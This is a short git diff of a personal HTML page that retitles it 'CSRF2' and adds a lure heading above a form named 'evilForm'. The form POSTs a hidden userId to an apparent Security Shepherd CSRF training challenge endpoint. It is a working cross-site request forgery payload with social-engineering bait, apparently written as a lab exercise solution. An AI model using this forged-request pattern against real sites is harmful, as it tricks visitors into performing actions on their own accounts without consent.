--- a/index.html
+++ b/index.html
@@ -1,9 +1,9 @@
 <HTML>
 <HEAD>
-<TITLE>Peter's Playground</TITLE>
+<TITLE>CSRF2</TITLE>
     <link href='https://fonts.googleapis.com/css?family=Orbitron' rel='stylesheet'>
 </HEAD>
-<H1 style="font-family:'Orbitron';font-size:18px">This is a Header</H1>
+<H1 style="font-family:'Orbitron';font-size:18px;width:350px">Are you telling me you don't want to know what this button does?</H1>
 <form name="evilForm" action="https://securityshepherd.com/user/csrfchallengetwo/plusplus" method="POST">
     <input type="hidden" name="userId" value="121dd11bf97d0492aac80ef0f4b8beffc9734786" />
     <input type="submit"/>
